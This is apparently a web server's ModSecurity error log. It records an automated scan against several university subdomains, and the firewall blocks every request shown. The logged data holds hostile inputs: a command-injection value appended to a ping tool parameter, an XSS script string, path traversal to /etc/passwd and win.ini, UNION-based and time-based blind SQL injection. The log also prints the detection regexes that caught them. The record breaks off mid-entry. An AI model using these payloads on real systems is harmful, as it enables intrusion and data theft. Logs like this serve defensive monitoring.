[Tue Aug 29 11:40:46.453418 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJRAAAAAB"]
[Tue Aug 29 11:40:46.481412 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgcAAAAE"]
[Tue Aug 29 11:40:48.372697 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO120MCo-f0AAAcqJEkAAAAG"]
[Tue Aug 29 11:40:50.361551 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcPi0MAAAAa"]
[Tue Aug 29 11:40:50.364950 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAYf-JwAAAAD"]
[Tue Aug 29 11:40:50.379989 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcbSAEAAAAv"]
[Tue Aug 29 11:40:50.382810 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAQSWncAAAA0"]
[Tue Aug 29 11:40:50.387580 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO120sCo-f0AAAcqJEsAAAAG"]
[Tue Aug 29 11:40:50.392321 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAYf-J0AAAAD"]
[Tue Aug 29 11:40:50.408465 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAQSWngAAAA0"]
[Tue Aug 29 11:40:50.408704 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAYMWSsAAAAR"]
[Tue Aug 29 11:40:50.412315 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAaZ9j8AAAAo"]
[Tue Aug 29 11:40:50.413081 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAYf-J4AAAAD"]
[Tue Aug 29 11:40:50.427936 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAQSWnkAAAA0"]
[Tue Aug 29 11:40:52.394794 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO121MCo-f0AAAcjAkwAAAAw"]
[Tue Aug 29 11:40:53.556248 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEQAAAAH"]
[Tue Aug 29 11:40:53.696710 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEsAAAAH"]
[Tue Aug 29 11:40:53.822869 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE0AAAAH"]
[Tue Aug 29 11:40:53.846359 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE4AAAAH"]
[Tue Aug 29 11:40:53.871558 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE8AAAAH"]
[Tue Aug 29 11:40:53.917591 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO121cCo-f0AAActbFEAAAAH"]
[Tue Aug 29 11:40:55.432948 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAaZ9kEAAAAo"]
[Tue Aug 29 11:40:55.443793 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAQSWoEAAAA0"]
[Tue Aug 29 11:40:55.454837 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO1218Co-f0AAAaZ9kIAAAAo"]
[Tue Aug 29 11:40:55.479715 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcvBbIAAAAJ"]
[Tue Aug 29 11:40:55.485372 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcuUmEAAAAI"]
[Tue Aug 29 11:40:55.498218 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAYf-KQAAAAD"]
[Tue Aug 29 11:40:56.453239 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO122MCo-f0AAAcvBbcAAAAJ"]
[Tue Aug 29 11:40:56.476254 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO122MCo-f0AAAcqJFoAAAAG"]
[Tue Aug 29 11:40:58.356196 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcqJGAAAAAG"]
[Tue Aug 29 11:40:58.358886 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcYU6oAAAAp"]
[Tue Aug 29 11:40:58.369432 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcbSBAAAAAv"]
[Tue Aug 29 11:40:58.375767 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 